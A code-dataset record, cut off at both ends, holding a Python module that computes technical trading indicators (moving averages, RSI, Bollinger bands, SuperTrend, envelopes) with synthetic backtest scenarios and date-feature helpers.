"usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 80, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Ridge", "line_number": 125, "usage_type": "call"}, {"api_name": "sklearn.linear_model", "line_number": 125, "usage_type": "name"}, {"api_name": "numpy.identity", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.linalg.solve", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 131, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 143, "usage_type": "call"}]}
+{"seq_id": "69930025127", "text": "import pandas as pd\nfrom parse import parse\nfrom stockstats import StockDataFrame as Sdf\nfrom finta import TA\nimport ta\nfrom collections import OrderedDict\nimport numpy as np\nfrom . import indicators_vsa as vsa\nfrom . import indicators_flabeling as flabeling\nfrom . import indicators_supertrend as supertrend\nfrom . import indicators_tradingview as tv\nfrom . import utils\n\ndef get_window_size(indicator):\n trend_parsed = parse('trend_{}d', indicator)\n sma_parsed = parse('sma_{}', indicator)\n ema_parsed = parse('ema_{}', indicator)\n wma_parsed = parse('wma_{}', indicator)\n\n if indicator in [\"open\", \"close\", \"high\", \"low\"]:\n return 1\n\n elif trend_parsed != None and trend_parsed[0].isdigit():\n return int(trend_parsed[0])\n\n elif sma_parsed != None and sma_parsed[0].isdigit():\n return int(sma_parsed[0])\n\n elif ema_parsed != None and ema_parsed[0].isdigit():\n return int(ema_parsed[0])\n\n elif wma_parsed != None and wma_parsed[0].isdigit():\n return int(wma_parsed[0])\n\n elif indicator in ['macd', 'macds', 'macdh']:\n return 26\n\n elif indicator == \"bbands\":\n return 20\n\n elif indicator in [\"rsi_30\", \"cci_30\", \"dx_30\"]:\n return 30\n \n elif indicator == \"rsi\":\n return 14\n\n elif indicator == 'williams_%r':\n return 14\n\n elif indicator in ['stoch_%k', 'stoch_%d']:\n return 14\n \n elif indicator == 'er':\n return 10\n \n elif indicator == 'stc':\n return 50\n \n elif indicator == 'atr':\n return 14\n \n elif indicator == 'adx':\n return 14\n \n elif indicator == 'roc':\n return 12\n\n elif indicator == 'mom':\n return 10\n\n elif indicator == 'simple_rtn':\n return 1\n\n elif indicator == 'labeling':\n return 20\n\n elif indicator.startswith('tv_'):\n return 0\n\n elif indicator.startswith('close_synthetic_'):\n return 0\n\n elif '_shift_' in indicator:\n lst_split = indicator.split(\"_\")\n if len(lst_split) == 3:\n return int(lst_split[2])\n else:\n return 0\n\n elif indicator == 'vsa':\n return 60\n\n elif indicator == \"super_trend_direction\":\n return 15\n\n print(\"unknown window size for \", indicator)\n return 0\n\ndef get_max_window_size(indicators):\n if len(indicators) == 0:\n return 0\n\n if isinstance(indicators, list):\n return max([get_window_size(indicator) for indicator in indicators])\n elif isinstance(indicators, dict):\n # if the parameters of all the indicators are dictionaries...\n #window_sizes = [parameters[\"window_size\"] if \"window_size\" in parameters else get_window_size(indicator) for indicator, parameters in indicators.items()]\n # but just in case there is something else :\n window_sizes = [0]\n for indicator in indicators:\n parameters = indicators[indicator]\n if isinstance(parameters, dict):\n parameters = indicators[indicator]\n if \"window_size\" in parameters:\n window_size = parameters[\"window_size\"]\n if isinstance(window_size, str):\n window_size = int(window_size)\n else:\n window_size = get_window_size(indicator)\n window_sizes.append(window_size)\n elif isinstance(parameters, int):\n window_sizes.append(parameters)\n else:\n window_size = get_window_size(indicator)\n window_sizes.append(window_size)\n\n return max(window_sizes)\n\n return 0\n\ndef get_feature_from_fdp_features(fdp_features):\n lst_features = []\n for feature in fdp_features:\n if len(fdp_features[feature]) == 0:\n lst_features.append(feature)\n elif fdp_features[feature] != None:\n lst_param = list(fdp_features[feature])\n if \"id\" in lst_param:\n id = \"_\" + fdp_features[feature][\"id\"]\n else:\n id = \"\"\n if \"n\" in lst_param:\n n = \"n\" + fdp_features[feature][\"n\"] + \"_\"\n else:\n n = \"\"\n if not feature.startswith(\"postprocess\"):\n lst_features.append(fdp_features[feature][\"indicator\"] + id)\n if \"output\" in lst_param:\n for output in fdp_features[feature][\"output\"]:\n lst_features.append(output + id)\n if \"indicator\" in fdp_features[feature] \\\n and fdp_features[feature][\"indicator\"] == \"shift\" \\\n and \"input\" in lst_param:\n for input in fdp_features[feature][\"input\"]:\n lst_features.append(n + input + id)\n return lst_features\n\ndef compute_indicators(df, indicators, keep_only_requested_indicators = False, params = None):\n if not isinstance(df, pd.DataFrame):\n return df\n\n # manage indicators as an array but it is converted into a dictionary\n if isinstance(indicators, list):\n indicators = dict.fromkeys(indicators, {})\n\n # call stockstats\n stock = Sdf.retype(df.copy())\n\n if isinstance(indicators, dict):\n keep_indicators = get_feature_from_fdp_features(indicators)\n else:\n keep_indicators = indicators\n\n # compute the indicators\n columns = list(df.columns)\n\n # be sure postprocess are treated at the end\n oindicators = OrderedDict()\n for indicator, parameters in indicators.items():\n if not indicator.startswith(\"postprocess\"):\n oindicators[indicator] = parameters\n for indicator, parameters in indicators.items():\n if indicator.startswith(\"postprocess\"):\n oindicators[indicator] = parameters\n \n\n for indicator, parameters in oindicators.items():\n if indicator in columns:\n continue\n \n # check if one deals with a postprocess\n if indicator.startswith(\"postprocess\"):\n if \"input\" in parameters and \"indicator\" in parameters and \"n\" in parameters:\n indicator = parameters[\"indicator\"]\n id = \"\"\n if \"id\" in parameters:\n id = \"_\"+parameters[\"id\"]\n n = parameters[\"n\"]\n if isinstance(n, str):\n n = int(n)\n input = [item+id for item in parameters[\"input\"]]\n if isinstance(input, list):\n if all(item in list(df.columns) for item in input):\n df = utils.get_n_columns(df, input, n)\n\n # check if the indicator is overriden\n if \"indicator\" in parameters:\n indicator = parameters[\"indicator\"]\n\n # prepare the suffix if an id is specified\n suffix = \"\"\n if 'id' in parameters:\n suffix = \"_\"+parameters[\"id\"]\n\n trend_parsed = parse('trend_{}d', indicator)\n sma_parsed = parse('sma_{}', indicator)\n ema_parsed = parse('ema_{}', indicator)\n wma_parsed = parse('wma_{}', indicator)\n slope_parsed = parse('slope_{}', indicator)\n\n if trend_parsed != None and trend_parsed[0].isdigit():\n seq = int(trend_parsed[0])\n diff = df[\"close\"] - df[\"close\"].shift(seq)\n df[\"trend_\"+str(seq)+\"d\"+ suffix] = diff.gt(0).map({False: 0, True: 1})\n\n elif indicator == \"sma\":\n seq = 10\n if \"window_size\" in parameters:\n seq = parameters[\"window_size\"]\n if isinstance(seq, str):\n seq = int(seq)\n df[\"sma\"+ suffix] = TA.SMA(stock, seq).copy()\n\n elif indicator == \"ema\":\n period = 10\n if \"window_size\" in parameters:\n period = parameters[\"window_size\"]\n if isinstance(period, str):\n period = int(period)\n # df[\"ema\"+ suffix] = TA.EMA(stock, period = period).copy()\n df[\"ema\"+ suffix] = ta.trend.ema_indicator(close=df['close'], window=period).copy()\n\n elif indicator == 'willr':\n period = 14\n if \"window_size\" in parameters:\n period = parameters[\"window_size\"]\n if isinstance(period, str):\n period = int(period)\n df['willr'] = ta.momentum.williams_r(high=df['high'], low=df['low'], close=df['close'], lbp=period).copy()\n\n elif indicator == 'willr_trend':\n period = 14\n if \"window_size\" in parameters:\n period = parameters[\"window_size\"]\n if isinstance(period, str):\n period = int(period)\n\n predict_window = 4\n if \"pred_window_size\" in parameters:\n predict_window = parameters[\"pred_window_size\"]\n if isinstance(predict_window, str):\n predict_window = int(predict_window)\n\n df['willr_trend'] = ta.momentum.williams_r(high=df['high'], low=df['low'], close=df['close'], lbp=period).copy()\n\n df['willr_trend' + suffix] = df['willr_trend' + suffix].shift(-1)\n df.at[df.index[-1], \"willr_trend\" + suffix] = 0\n predict_val, coef = utils.predict_next_LinearRegression(df, 'willr_trend' + suffix, predict_window)\n\n df[\"willr_trend\" + suffix] = utils.discret_coef(coef)\n\n elif indicator == \"wma\":\n period = 10\n if \"window_size\" in parameters:\n period = parameters[\"window_size\"]\n if isinstance(period, str):\n period = int(period)\n df[\"wma\"+ suffix] = TA.WMA(stock, period = period).copy()\n\n elif sma_parsed != None and sma_parsed[0].isdigit():\n seq = int(sma_parsed[0])\n df[\"sma_\"+str(seq)+ suffix] = TA.SMA(stock, seq).copy()\n\n elif ema_parsed != None and ema_parsed[0].isdigit():\n period = int(ema_parsed[0])\n df[\"ema_\"+str(period)+ suffix] = TA.EMA(stock, period = period).copy()\n\n elif wma_parsed != None and wma_parsed[0].isdigit():\n period = int(wma_parsed[0])\n df[\"wma_\"+str(period)+ suffix] = TA.WMA(stock, period = period).copy()\n\n elif slope_parsed != None and slope_parsed[0].isdigit():\n period = int(slope_parsed[0])\n df[\"slope_\"+str(period)+ suffix] = df[\"close\"].rolling(window=period).apply(lambda x: np.polyfit(range(len(x)), x, 1)[0])\n\n elif indicator == 'macd':\n df['macd' + suffix] = stock.get('macd').copy() # from stockstats\n #df['macd'] = TA.MACD(stock)['MACD'].copy() # from finta\n\n elif indicator == 'macds':\n df['macds' + suffix] = stock.get('macds').copy() # from stockstats\n\n elif indicator == 'macdh':\n df['macdh' + suffix] = stock.get('macdh').copy() # from stockstats\n\n elif indicator == 'bbands':\n bbands = TA.BBANDS(stock).copy()\n df = pd.concat([df, bbands], axis = 1)\n df.rename(columns={'BB_UPPER': 'bb_upper' + suffix}, inplace=True)\n df.rename(columns={'BB_MIDDLE': 'bb_middle' + suffix}, inplace=True)\n df.rename(columns={'BB_LOWER': 'bb_lower' + suffix}, inplace=True)\n\n elif indicator == 'rsi':\n rsi_window = 14\n if \"window_size\" in parameters:\n rsi_window = parameters[\"window_size\"]\n if isinstance(rsi_window, str):\n rsi_window = int(rsi_window)\n df['rsi' + suffix] = ta.momentum.rsi(close=df[\"close\"], window=rsi_window)\n\n elif indicator == 'stoch_rsi':\n rsi_window = 14\n smooth_k = 3\n smooth_d = 3\n if \"stoch_rsi_window_size\" in parameters:\n rsi_window = parameters[\"stoch_rsi_window_size\"]\n if isinstance(rsi_window, str):\n rsi_window = int(rsi_window)\n\n df['stoch_rsi' + suffix] = ta.momentum.stochrsi(close=df[\"close\"]\n , window=rsi_window) * 100\n df['stoch_rsi_k' + suffix] = ta.momentum.StochRSIIndicator(close=df[\"close\"],\n window=rsi_window).stochrsi_k() * 100\n df['stoch_rsi_d' + suffix] = ta.momentum.StochRSIIndicator(close=df[\"close\"],\n window=rsi_window).stochrsi_d() * 100\n elif indicator == 'stoch_rsi_pred':\n rsi_window = 14\n if \"stoch_rsi_window_size\" in parameters:\n rsi_window = parameters[\"stoch_rsi_window_size\"]\n if isinstance(rsi_window, str):\n rsi_window = int(rsi_window)\n \n predict_window = 4\n if \"pred_window_size\" in parameters:\n predict_window = parameters[\"pred_window_size\"]\n if isinstance(predict_window, str):\n predict_window = int(predict_window)\n \n df['stoch_rsi_pred' + suffix] = ta.momentum.StochRSIIndicator(close=df[\"close\"], window=rsi_window).stochrsi() * 100\n df['stoch_rsi_pred' + suffix] = df['stoch_rsi_pred' + suffix].shift(-1)\n df.at[df.index[-1], \"stoch_rsi_pred\" + suffix] = 0\n predict_val, coef = utils.predict_next_LinearRegression(df, 'stoch_rsi_pred' + suffix, predict_window)\n if predict_val < 0:\n predict_val = 0\n elif predict_val > 100:\n predict_val = 100\n df.at[df.index[-1], \"stoch_rsi_pred\" + suffix] = predict_val\n\n elif indicator == 'stoch_rsi_trend':\n rsi_window = 14\n if \"stoch_rsi_window_size\" in parameters:\n rsi_window = parameters[\"stoch_rsi_window_size\"]\n if isinstance(rsi_window, str):\n rsi_window = int(rsi_window)\n\n predict_window = 4\n if \"pred_window_size\" in parameters:\n predict_window = parameters[\"pred_window_size\"]\n if isinstance(predict_window, str):\n predict_window = int(predict_window)\n \n df['stoch_rsi_trend' + suffix] = ta.momentum.StochRSIIndicator(close=df[\"close\"],\n window=rsi_window).stochrsi() * 100\n df['stoch_rsi_k_trend' + suffix] = ta.momentum.StochRSIIndicator(close=df[\"close\"],\n window=rsi_window).stochrsi_k() * 100\n df['stoch_rsi_d_trend' + suffix] = ta.momentum.StochRSIIndicator(close=df[\"close\"],\n window=rsi_window).stochrsi_d() * 100\n df['stoch_rsi_trend' + suffix] = df['stoch_rsi_trend' + suffix].shift(-1)\n df['stoch_rsi_k_trend' + suffix] = df['stoch_rsi_k_trend' + suffix].shift(-1)\n df['stoch_rsi_d_trend' + suffix] = df['stoch_rsi_d_trend' + suffix].shift(-1)\n\n df.at[df.index[-1], \"stoch_rsi_trend\" + suffix] = 0\n predict_val, coef = utils.predict_next_LinearRegression(df, 'stoch_rsi_trend' + suffix, predict_window)\n df[\"stoch_rsi_trend\" + suffix] = utils.discret_coef(coef)\n\n df.at[df.index[-1], \"stoch_rsi_k_trend\" + suffix] = 0\n predict_val, coef = utils.predict_next_LinearRegression(df, 'stoch_rsi_k_trend' + suffix, predict_window)\n df[\"stoch_rsi_k_trend\" + suffix] = utils.discret_coef(coef)\n\n df.at[df.index[-1], \"stoch_rsi_d_trend\" + suffix] = 0\n predict_val, coef = utils.predict_next_LinearRegression(df, 'stoch_rsi_d_trend' + suffix, predict_window)\n df[\"stoch_rsi_d_trend\" + suffix] = utils.discret_coef(coef)\n\n elif indicator == 'atr':\n atr_window = 14\n if \"window_size\" in parameters:\n atr_window = parameters[\"window_size\"]\n if isinstance(atr_window, str):\n atr_window = int(atr_window)\n df['atr' + suffix] = ta.volatility.AverageTrueRange(high=df[\"high\"], low=df[\"low\"], close=df[\"close\"], window=atr_window).average_true_range()\n\n elif indicator == 'ao':\n ao_window_1 = 6\n if \"ao_window_1\" in parameters:\n ao_window_1 = parameters[\"ao_window_1\"]\n if isinstance(ao_window_1, str):\n ao_window_1 = int(ao_window_1)\n\n ao_window_2 = 22\n if \"ao_window_2\" in parameters:\n ao_window_2 = parameters[\"ao_window_2\"]\n if isinstance(ao_window_2, str):\n ao_window_2 = int(ao_window_2)\n\n df['ao'] = ta.momentum.awesome_oscillator(df['high'], df['low'], window1=ao_window_1, window2=ao_window_2).copy()\n \n elif indicator == 'ao_trend':\n ao_window_1 = 6\n if \"ao_window_1\" in parameters:\n ao_window_1 = parameters[\"ao_window_1\"]\n if isinstance(ao_window_1, str):\n ao_window_1 = int(ao_window_1)\n\n ao_window_2 = 22\n if \"ao_window_2\" in parameters:\n ao_window_2 = parameters[\"ao_window_2\"]\n if isinstance(ao_window_2, str):\n ao_window_2 = int(ao_window_2)\n \n predict_window = 4\n if \"pred_window_size\" in parameters:\n predict_window = parameters[\"pred_window_size\"]\n if isinstance(predict_window, str):\n predict_window = int(predict_window)\n\n df['ao_trend'] = ta.momentum.awesome_oscillator(df['high'], df['low'], window1=ao_window_1, window2=ao_window_2).copy()\n df['ao_trend' + suffix] = df['ao_trend' + suffix].shift(-1)\n df.at[df.index[-1], \"ao_trend\" + suffix] = 0\n predict_val, coef = utils.predict_next_LinearRegression(df, 'ao_trend' + suffix, predict_window)\n \n df[\"ao_trend\" + suffix] = utils.discret_coef(coef)\n\n elif indicator == 'bollinger':\n bol_window = 100\n if \"window_size\" in parameters:\n bol_window = parameters[\"window_size\"]\n if isinstance(bol_window, str):\n bol_window = int(bol_window)\n bol_std = 2.25\n if \"bol_std\" in parameters:\n bol_std = parameters[\"bol_std\"]\n if isinstance(bol_std, str):\n bol_std = float(bol_std)\n long_ma_window = 500\n\n bol_band = ta.volatility.BollingerBands(close=df[\"close\"], window=bol_window, window_dev=bol_std)\n df[\"lower_band\"+ suffix] = bol_band.bollinger_lband()\n df[\"higher_band\"+ suffix] = bol_band.bollinger_hband()\n df[\"ma_band\"+ suffix] = bol_band.bollinger_mavg()\n df['long_ma' + suffix] = ta.trend.sma_indicator(close=df['close'], window=long_ma_window)\n\n df['bollinger' + suffix] = True # bollinger indicator trigger\n\n elif indicator == 'envelope':\n envelope_window = 5\n if \"window_size\" in parameters:\n envelope_window = parameters[\"ma_window_size\"]\n if isinstance(envelope_window, str):\n envelope_window = int(envelope_window)\n\n ma = \"sma\"\n if \"ma\" in parameters:\n ma = parameters[\"ma\"]\n if not isinstance(\"ma\", str):\n ma = \"sma\"\n\n ma_offset_1 = 3\n ma_offset_2 = 5\n ma_offset_3 = 7\n if \"ma_offset_1\" in parameters:\n ma_offset_1 = parameters[\"ma_offset_1\"]\n if isinstance(ma_offset_1, str):\n ma_offset_1 = float(ma_offset_1)\n if \"ma_offset_2\" in parameters:\n ma_offset_2 = parameters[\"ma_offset_2\"]\n if isinstance(ma_offset_2, str):\n ma_offset_2 = float(ma_offset_2)\n if \"ma_offset_3\" in parameters:\n ma_offset_3 = parameters[\"ma_offset_3\"]\n if isinstance(ma_offset_3, str):\n ma_offset_3 = float(ma_offset_3)\n\n if ma == \"sma\":\n df[\"ma_base\"+ suffix] = ta.trend.SMAIndicator(close=df[\"close\"], window=envelope_window).sma_indicator()\n # df[\"ma_base\"+ suffix] = ta.trend.sma_indicator(close=df[\"close\"], window=envelope_window)\n # df[\"ma_base\"+ suffix] = TA.SMA(df, envelope_window, \"close\")\n\n predict_val, coef = utils.predict_next_LinearRegression(df, \"ma_base\"+ suffix, envelope_window)\n df.at[df.index[-1], \"ma_base\" + suffix] = predict_val\n\n df[\"envelope_long_1\"+ suffix] = df[\"ma_base\"+ suffix] - df[\"ma_base\"+ suffix] * ma_offset_1 / 100\n df[\"envelope_long_2\"+ suffix] = df[\"ma_base\"+ suffix] - df[\"ma_base\"+ suffix] * ma_offset_2 / 100\n df[\"envelope_long_3\"+ suffix] = df[\"ma_base\"+ suffix] - df[\"ma_base\"+ suffix] * ma_offset_3 / 100\n\n df[\"envelope_short_1\"+ suffix] = df[\"ma_base\"+ suffix] + df[\"ma_base\"+ suffix] * ma_offset_1 / 100\n df[\"envelope_short_2\"+ suffix] = df[\"ma_base\"+ suffix] + df[\"ma_base\"+ suffix] * ma_offset_2 / 100\n df[\"envelope_short_3\"+ suffix] = df[\"ma_base\"+ suffix] + df[\"ma_base\"+ suffix] * ma_offset_3 / 100\n\n df['envelope' + suffix] = True # bollinger indicator trigger\n\n elif indicator == 'synthetic_bollinger':\n df.reset_index(inplace=True)\n # TEST SCENARIO\n df['close'] = 10\n df[\"lower_band\"+ suffix] = 9\n df[\"higher_band\"+ suffix] = 11\n df[\"ma_band\"+ suffix] = 9.5\n df[\"long_ma\"+ suffix] = 7\n\n t = 1000 + 50\n t_plus = 25\n df.at[t, \"close\"] = df[\"higher_band\"+ suffix].iloc[t] + 0.01\n # OPEN LONG\n df['close'] = np.where(df.index >= t, df[\"higher_band\"+ suffix] + 0.5, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"higher_band\"+ suffix] + 1, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"higher_band\"+ suffix] + 1.5, df['close'])\n # CLOSE LONG\n t = t + t_plus\n df['ma_band' + suffix] = np.where(df.index >= t, df[\"close\"] + 1, df['ma_band' + suffix])\n\n # OPEN SHORT\n t = t + t_plus\n df['lower_band' + suffix] = np.where(df.index >= t, df[\"close\"] + 0.6, df['lower_band' + suffix])\n df['long_ma+ suffix'] = np.where(df.index >= t, df[\"close\"] + 0.3, df['long_ma' + suffix])\n\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] - 0.5, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] - 1, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] - 1.5, df['close'])\n t = t + t_plus\n # CLOSE SHORT\n df['ma_band' + suffix] = np.where(df.index >= t, df[\"close\"] - 2.5, df['ma_band' + suffix])\n\n # OPEN LONG\n t = t + t_plus\n df['long_ma' + suffix] = np.where(df.index >= t, df[\"close\"] - 0.3, df['long_ma' + suffix])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"higher_band\"+ suffix] + 0.5, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] - 0.5, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] - 1, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] - 1.5, df['close'])\n # CLOSE LONG\n t = t + t_plus\n df['ma_band' + suffix] = np.where(df.index >= t, df[\"close\"] + 2, df['ma_band' + suffix])\n\n t = t + t_plus\n df['higher_band' + suffix] = np.where(df.index >= t, df[\"higher_band\"+ suffix] + 4, df['higher_band' + suffix])\n\n # OPEN SHORT\n t = t + t_plus\n df['lower_band' + suffix] = np.where(df.index >= t, df[\"close\"] - 1, df['lower_band' + suffix])\n t = t + t_plus\n df['lower_band' + suffix] = np.where(df.index >= t, df[\"close\"] + 1, df['lower_band' + suffix])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] + 0.5, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] + 1, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] + 1.5, df['close'])\n # CLOSE SHORT BY MA_BAND ALREADY BELOW CLOSE\n\n # OPEN LONG\n t = t + t_plus\n df['higher_band' + suffix] = np.where(df.index >= t, df[\"higher_band\"+ suffix] - 4, df['higher_band' + suffix])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] + 0.5, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] + 1, df['close'])\n t = t + t_plus\n df['close'] = np.where(df.index >= t, df[\"close\"] + 1.5, df['close'])\n\n # CLOSE LONG\n t = t + t_plus\n df['ma_band' + suffix] = np.where(df.index >= t, df[\"close\"] + 0.5, df['ma_band' + suffix])\n\n # END OF SCENARIO\n df.set_index(['timestamp'], inplace=True, drop=True)\n df = utils.get_n_columns(df, [\"ma_band\"+ suffix, \"lower_band\"+ suffix, \"higher_band\"+ suffix, \"close\"], 1)\n\n df['syntheticbollinger' + suffix] = True # bollinger indicator trigger\n\n elif indicator == 'cci_30':\n df['cci_30' + suffix] = stock.get('cci_30').copy()\n \n elif indicator == 'dx_30':\n df['dx_30' + suffix] = stock.get('dx_30').copy()\n \n elif indicator == 'williams_%r':\n df['williams_%r' + suffix] = TA.WILLIAMS(stock).copy()\n\n elif indicator == 'stoch_%k':\n df['stoch_%k' + suffix] = TA.STOCH(stock).copy()\n\n elif indicator == 'stoch_%d':\n df['stoch_%d' + suffix] = TA.STOCHD(stock).copy()\n \n elif indicator == 'er':\n df['er' + suffix] = TA.ER(stock).copy()\n \n elif indicator == 'stc':\n df['stc' + suffix] = TA.STC(stock).copy()\n \n elif indicator == 'adx':\n df['adx' + suffix] = TA.ADX(stock).copy()\n \n elif indicator == 'roc':\n df['roc' + suffix] = TA.ROC(stock).copy()\n\n elif indicator == 'mom':\n df['mom' + suffix] = TA.MOM(stock).copy()\n\n elif indicator == 'simple_rtn':\n df['simple_rtn' + suffix] = df['close'].pct_change()\n\n elif indicator == 'labeling':\n df = flabeling.data_labeling(df, params)\n\n elif indicator.startswith('tv_'):\n df[indicator] = tv.get_recommendation(df, indicator, params)\n\n # shift feature: column_shift_nb ex: close_shift_5\n elif '_shift_' in indicator:\n lst_split = indicator.split(\"_\")\n df[indicator+ suffix] = df[lst_split[0]].shift(int(lst_split[2]), axis=0)\n\n elif indicator == 'vsa':\n days = [1, 2, 3, 5, 20, 40, 60]\n df = vsa.create_bunch_of_vsa_features(df, days)\n df['outcomes_vsa' + suffix] = df.close.pct_change(-1)\n\n elif indicator == \"super_trend_direction\":\n st = supertrend.SuperTrend(\n df['high'], \n df['low'], \n df['close'], \n 15, # self.st_short_atr_window\n 5 # self.st_short_atr_multiplier\n )\n \n df['super_trend_direction' + suffix] = st.super_trend_direction()\n #df['super_trend_direction'] = df['super_trend_direction'].shift(1)\n\n elif indicator == \"super_reversal\":\n short_ema_window = 5\n long_ema_window = 15\n # -- Populate indicators --\n super_trend = supertrend.SuperTrend(\n df['high'],\n df['low'],\n df['close'],\n long_ema_window,\n short_ema_window\n )\n df['super_trend_direction' + suffix] = super_trend.super_trend_direction()\n df['ema_short' + suffix] = ta.trend.ema_indicator(close=df['close'], window=short_ema_window)\n df['ema_long' + suffix] = ta.trend.ema_indicator(close=df['close'], window=long_ema_window)\n\n df = utils.get_n_columns(df, [\"super_trend_direction\"+ suffix, \"ema_short\"+ suffix, \"ema_long\"+ suffix], 1)\n df['superreversal' + suffix] = True # super_reversal indicator trigger\n df['super_reversal' + suffix] = True # super_reversal indicator trigger\n\n elif indicator == 'syntheticsuperreversal':\n df.reset_index(inplace=True)\n # TEST SCENARIO\n df['close'] = 5\n df[\"high\"] = 10\n df[\"low\"] = 17\n df[\"n1_ema_short\"+ suffix] = 14\n df[\"n1_ema_long\"+ suffix] = 15\n df[\"n1_super_trend_direction\"+ suffix] = False\n\n # OPEN LONG AT t\n t = 100 + 400\n df['n1_ema_short' + suffix] = np.where(df.index >= t, df[\"n1_ema_long\"+ suffix] + 1, df['n1_ema_short' + suffix])\n df['n1_super_trend_direction+ suffix'] = np.where(df.index >= t, True, df['n1_super_trend_direction' + suffix])\n df['low'] = np.where(df.index >= t, df[\"n1_ema_short\"+ suffix] - 1, df['low'])\n\n df['close'] = np.where(df.index >= t + 10, df[\"close\"] + 1, df['close'])\n\n # CLOSING SHORT\n t = t + 100\n df['n1_ema_short' + suffix] = np.where(df.index >= t, df[\"n1_ema_long\"+ suffix] - 1, df['n1_ema_short' + suffix])\n df['n1_super_trend_direction' + suffix] = np.where(df.index >= t, False, df['n1_super_trend_direction' + suffix])\n df['high'] = np.where(df.index >= t, df[\"n1_ema_short\"+ suffix] + 5, df['high'])\n\n # CLOSING SHORT\n t = t + 100\n df['n1_ema_short' + suffix] = np.where(df.index >= t, 20, df['n1_ema_short' + suffix])\n df['n1_ema_long' + suffix] = np.where(df.index >= t, df['n1_ema_short' + suffix] -1, df['n1_ema_long' + suffix])\n df['n1_super_trend_direction' + suffix] = np.where(df.index >= t, True, df['n1_super_trend_direction' + suffix])\n df['low'] = np.where(df.index >= t, df['n1_ema_short' + suffix] -1, df['low'])\n\n # OPENING SHORT\n t = t + 100\n df['n1_ema_short' + suffix] = np.where(df.index >= t, 25, df['n1_ema_short' + suffix])\n df['n1_ema_long' + suffix] = np.where(df.index >= t, df['n1_ema_short' + suffix] +1, df['n1_ema_long' + suffix])\n df['n1_super_trend_direction' + suffix] = np.where(df.index >= t, False, df['n1_super_trend_direction' + suffix])\n df['high'] = np.where(df.index >= t, df['n1_ema_short' + suffix] +2, df['high'])\n\n df['close'] = np.where(df.index >= t + 10, df[\"close\"] - 1, df['close'])\n\n # CLOSING SHORT\n t = t + 100\n df['n1_ema_short' + suffix] = np.where(df.index >= t, 30, df['n1_ema_short' + suffix])\n df['n1_ema_long' + suffix] = np.where(df.index >= t, df['n1_ema_short' + suffix] -1, df['n1_ema_long' + suffix])\n df['n1_super_trend_direction' + suffix] = np.where(df.index >= t, True, df['n1_super_trend_direction' + suffix])\n df['low'] = np.where(df.index >= t, df['n1_ema_short' + suffix] -1, df['low'])\n\n df[\"ema_short\"+ suffix] = df[\"n1_ema_short\"+ suffix]\n df[\"ema_long\"+ suffix] = df[\"n1_ema_long\"+ suffix]\n df[\"super_trend_direction\"+ suffix] = df[\"n1_super_trend_direction\"+ suffix]\n\n df['syntheticsuperreversal' + suffix] = True\n\n df.set_index(['timestamp'], inplace=True, drop=True)\n\n # keep only the requested indicators\n if keep_only_requested_indicators:\n for column in list(df.columns):\n if column not in keep_indicators:\n df.drop(columns=[column], inplace=True)\n\n # drop \"timestamp\" as it is redundant with index\n if \"timestamp\" in list(df.columns):\n df.drop(columns=[\"timestamp\"], inplace=True)\n \n return df\n \ndef make_date(df, date_field):\n \"Make sure `df[date_field]` is of the right date type.\"\n field_dtype = df[date_field].dtype\n if isinstance(field_dtype, pd.core.dtypes.dtypes.DatetimeTZDtype):\n field_dtype = np.datetime64\n if not np.issubdtype(field_dtype, np.datetime64):\n df[date_field] = pd.to_datetime(df[date_field], infer_datetime_format=True)\n\ndef add_temporal_indicators(df, field_name, time=False):\n \"Helper function that adds columns relevant to a date in the column `field_name` of `df`.\"\n\n # Change all column headings to be lower case, and remove spacing\n df.columns = [str(x).lower().replace(' ', '_') for x in df.columns]\n\n if field_name not in df.columns and field_name != df.index.name:\n print(\"[add_temporal_indicators] {} is not present among the columns {} or in the index {}\".format(field_name, df.columns, df.index.name))\n return df\n\n # if the datefield is the index of the dataframe, we create a temporary column\n field_to_drop = False\n if field_name == df.index.name:\n field_name = 'DateTmp'\n df[field_name] = df.index\n field_to_drop = True\n\n make_date(df, field_name)\n\n field = df[field_name]\n prefix = \"\" #ifnone(prefix, re.sub('[Dd]ate$', '', field_name))\n attr = ['Year', 'Month', 'Week', 'Day', 'Dayofweek', 'Dayofyear', 'Is_month_end', 'Is_month_start',\n 'Is_quarter_end', 'Is_quarter_start', 'Is_year_end', 'Is_year_start']\n if time: attr = attr + ['Hour', 'Minute', 'Second']\n # Pandas removed `dt.week` in v1.1.10\n week = field.dt.isocalendar().week.astype(field.dt.day.dtype) if hasattr(field.dt, 'isocalendar') else field.dt.week\n for n in attr: df[prefix + n] = getattr(field.dt, n.lower()) if n != 'Week' else week\n mask = ~field.isna()\n df[prefix + 'Elapsed'] = np.where(mask, field.values.astype(np.int64) // 10 ** 9, np.nan)\n if field_to_drop: df.drop(field_name, axis=1, inplace=True)\n\n return df\n\ndef remove_features(df, features):\n for feature in features:\n try:\n df.drop(feature, axis=1, inplace=True)\n except KeyError as feature:\n print(\"{}. Columns are {}\".format(feature, df.columns))\n return df\n\ndef normalize_column_headings(df):\n # Change all column headings to be lower case, and remove spacing\n df.columns = [str(x).lower().replace(' ', '_') for x in df.columns]\n return df\n\ndef get_trend_info(df):\n 